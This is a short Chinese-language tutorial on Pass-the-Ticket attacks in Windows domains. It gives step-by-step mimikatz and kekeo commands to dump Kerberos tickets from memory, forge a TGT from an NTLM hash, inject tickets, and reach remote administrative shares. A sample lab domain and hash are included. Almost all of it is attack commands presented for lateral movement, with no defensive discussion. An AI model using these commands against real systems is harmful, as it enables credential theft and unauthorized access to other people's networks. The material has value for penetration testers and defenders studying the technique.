票据传递(Pass The Ticket)攻击与利用
票据传递工具简介
要想使用 mimikatz 的哈希传递功能,必须具有管理员权限。
mimikatz 同样提供了不需要本地管理员权限进行横向渗透的方法,实现未授权访问,例如票据传递攻击(Pass The Ticket,PTT)
Pass The Ticket
使用 mimikatz 进行票据传递
使用mimikatz(管理员权限)将内存的票据导出:(运行以下命令会在当前目录生成多个服务的票据文件)
mimikatz.exe "privilege::debug" "sekurlsa::tickets /export"
从中选择一个目标系统自己的,移动到黑客机器上。
将票据文件注入内存:
mimikatz "kerberos::ptt "[0;4ee98c]-2-0-60a00000-Administrator@krbtgt-GOD.ORG.kirbi"
将最高权限的票据文件注入内存后,将列出远程计算机系统的文件目录:
dir \\192.168.3.25\C$
遇到密码错误的问题那么我们把IP换成目标主机名:
dir \\mary-pc\c$
票据传递比哈希传递更方便,更实用,成功率更高。
如果要清除内存中的票据使用mimikatz运行下面的命令:
kerberos::purge
使用 kekeo 进行票据传递
kekeo 下载地址:https://github.com/gentilkiwi/kekeo/releases/
kekeo 需要使用域名、用户名、NTLM Hash 三者配合生成票据,再将票据导入,从而直接连接远程计算机。
域名:god.org
用户名:administrator
NTLM Hash:ccef208c6485269c20db2cad21734fe7也就是在目标机器上运行下面的命令,只需要普通权限就可以!
kekeo.exe "tgt::ask /user:administrator /domain:god.org /ntlm:ccef208c6485269c20db2cad21734fe7"
这个时候会在当前路径下生成一个票据文件:TGT_administrator@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi
之后把这个票据文件移动到黑客的机器上,在黑客机器上使用 kekeo 输入命令将移动的票据导入内存:
kerberos::ptt TGT_administrator@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi
这个时候就可以使用 dir 命令,列出远程主机中的文件:
dir \\OWA2010CN-God\c$
PS:使用 dir 命令时,务必使用主机名,如果使用 IP 地址,就有可能导致错误。
参考文章:
https://blog.csdn.net/shuteer_xu/article/details/107031951
https://www.cnblogs.com/Xy--1/p/12231747.html